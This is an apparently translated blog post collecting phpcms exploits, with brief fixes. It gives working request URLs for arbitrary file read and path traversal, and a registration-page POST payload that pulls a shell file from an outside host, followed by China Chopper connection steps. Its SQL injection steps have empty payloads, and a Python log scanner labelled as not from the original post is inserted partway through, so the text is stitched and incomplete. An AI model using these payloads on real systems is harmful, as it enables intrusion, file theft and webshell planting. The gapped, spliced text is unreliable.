phpcms vulnerability

Fenghua is a sand drifting, old is a period of time

Recently a well-known researcher announced that three phpcms 0day vulnerabilities would be released. So far I know of two phpcms vulnerabilities that have circulated with a public PoC. phpcms is still fairly widely deployed, so in this post I will share some of the latest phpcms vulnerabilities.

Disclaimer: The tools in this article are for personal testing and research only. Please delete them within 24 hours of downloading. Do not use them for commercial or illegal purposes.

phpcms arbitrary file read vulnerability

Updated on May 4, 2017
For the full details of the vulnerability, see: http://bobao.360.cn/learning/detail/3805.html

Vulnerability

Method 1:
Log in as a normal user and access the link:

```
http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C
```

Take the returned att_json value and pass this JSON value into the init function of the down class:

```
http://localhost/index.php?m=content&c=down&a=init&a_k=013ceMuDOmbKROPvvdV0SvY95fzhHTfURBCK4CSbrnbVp0HQOGXTxiHdRp2jM-onG9vE0g5SKVcO_ASqdLoOSsBvN7nFFopz3oZSTo2P7b6N_UB037kehz2lj12lFGtTsPETp-a0mAHXgyjn-tN7cw4nZdk10Mr2g5NM_x215AeqpOF6_mIF7NsXvWiZl35EmQ
```

Method 2:
Without logging in, access:

```
http://localhost/index.php?m=wap&c=index&a=init&siteid=1
```

Get the current siteid and then visit:

```
http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C
POST_DATA:userid_flash=14e0uml6m504Lbwsd0mKpCe0EocnqxTnbfm4PPLW
```

Fix

Upgrade to the latest official version.

phpcms SQL injection vulnerability

PoC

The following page has a SQL injection vulnerability:
http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login

To get the current database, POST:

To get the current user, POST:

To get the table name:

To get another table name, change the limit.

To get the username:

To get the password:

The password obtained is a 30-character MD5 hash, while a normal MD5 hash is 32 characters, so the last 2 characters still have to be fetched:

phpcms salts its passwords, so get the salt:

The PoC above comes from: https://www.unhonker.com/bug/1834.html

Exploit script

The exploit script is not released publicly here. You can check for the vulnerability with the online detection platform: https://www.seebug.org/monster/
For an exploit script, refer to: https://www.waitalone.cn/phpcmsv9-authkey-exp.html
For details of the vulnerability, refer to: http://mp.weixin.qq.com/s/cI-wbQyX-3WLhxJ5kqez4A

Vulnerability fix

  • Remove the modules\content\down.php file

phpcms registration page getshell vulnerability

  • Vulnerability types: PHP remote file inclusion, arbitrary file upload
  • Exploit point: phpcms registration page
  • Exploitation method: an HTTP POST request leads to arbitrary file upload + getshell

PoC POST data

```
siteid=1&modelid=11&username=newbie&password=newbie&email=newbie@qq.com&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=
```

Note: http://shhdmqz.com/newbie.txt is a shell file on a remote server. This vulnerability chains a remote file inclusion with a file upload vulnerability.

Exploitation details

Visit the registration page and send the POST request, with the info field rewritten to contain the address of the remotely included file, "img src=http://shhdmqz.com/newbie.txt?.php#.jpg". Here newbie.txt is the file name, and "?.php#.jpg" is the constructed file name used to bypass the extension restriction. The response will contain an error message, but the file is uploaded successfully, and the error message reveals the path of the uploaded file, to which a webshell client such as China Chopper (菜刀) can then be connected.

Exploit script

The exploit script is not released publicly here. You can check for the vulnerability with the online detection platform: https://www.seebug.org/monster/

Vulnerability fix

Temporary fix:

  • Close the registration page
  • Turn off remote file inclusion, i.e. disable allow_url_fopen

Thorough fix:
Modify the download function in the phpcms/libs/classes/attachment.class.php file.
In the foreach($remotefileurls as $k=>$file) loop (around line 167), change

```php
if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue; $filename = fileext($file);
```

to

```php
$filename = fileext($k);
```

For file inclusion vulnerabilities, refer to: [File inclusion vulnerabilities](http://thief.one/2017/04/10/2/)

Arbitrary File Read Vulnerability

```
index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php
```
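As an added defender-side example (not code from the original post), the script below scans web-server access-log lines for the two GET-based chains described on this page: the swfupload_json request that points src at down.php followed by the same client's content/down init call, and the public_get_suggest_keyword request with a backslash-obfuscated traversal in q. It assumes combined log format; the log lines, IPs and a_k values are constructed, and the registration getshell is out of scope because its payload is in the POST body, which an access log does not record.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); IPs and a_k values are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2017:09:04:01 +0800] "GET /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26s%3D./phpcms/modules/content/down.ph&f=p HTTP/1.1" 200 512
10.0.0.5 - - [12/Apr/2017:09:04:02 +0800] "GET /index.php?m=content&c=down&a=init&a_k=AAAA HTTP/1.1" 200 2048
10.0.0.7 - - [12/Apr/2017:09:05:10 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=x&q=..%5C/..%5C/caches/error_log.php HTTP/1.1" 200 9000
10.0.0.9 - - [12/Apr/2017:09:06:00 +0800] "GET /index.php?m=content&c=down&a=init&a_k=BBBB HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

def first(params, key):
    """Return the first value of a query parameter, or '' if it is absent."""
    return params.get(key, [''])[0]

def has_traversal(value):
    """True if the value climbs directories once backslashes and URL-encoding are stripped."""
    cleaned = unquote(value).replace('\\', '')
    return '../' in cleaned

def scan_log(text):
    """Return (ip, rule, target) findings for the phpcms request patterns on this page."""
    findings = []
    primed = set()  # clients that already issued the swfupload_json stage
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.group('ip'), m.group('target')
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        mod, ctl, act = first(params, 'm'), first(params, 'c'), first(params, 'a')
        # Stage 1 of the file-read chain: swfupload_json asked to sign a path into down.php
        if (mod, ctl, act) == ('attachment', 'attachments', 'swfupload_json') \
                and 'down.ph' in unquote(first(params, 'src')):
            primed.add(ip)
            findings.append((ip, 'swfupload_json_down_path', target))
        # Stage 2: the same client replays the signed a_k into content/down init
        elif (mod, ctl, act) == ('content', 'down', 'init') and 'a_k' in params and ip in primed:
            findings.append((ip, 'down_init_after_swfupload_json', target))
        # Search suggest keyword with a ..\/ style traversal in q (the backslash is stripped first)
        elif (mod, ctl, act) == ('search', 'index', 'public_get_suggest_keyword') \
                and has_traversal(first(params, 'q')):
            findings.append((ip, 'suggest_keyword_traversal', target))
    return findings

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

An ordinary download link (the fourth sample line) is not flagged, because a_k requests are only reported from a client that already performed the swfupload_json stage.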

phpcms sensitive information

  • This article will continue to track the latest phpcms vulnerability status and attach detection methods and fixes, to help administrators patch as soon as possible. Thank you!

Title: phpcms vulnerability

Author: nmask

Published: April 12, 2017 - 09:04

Last updated: July 11, 2019 - 16:07

Original link: https://thief.one/2017/04/12/01/en/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.
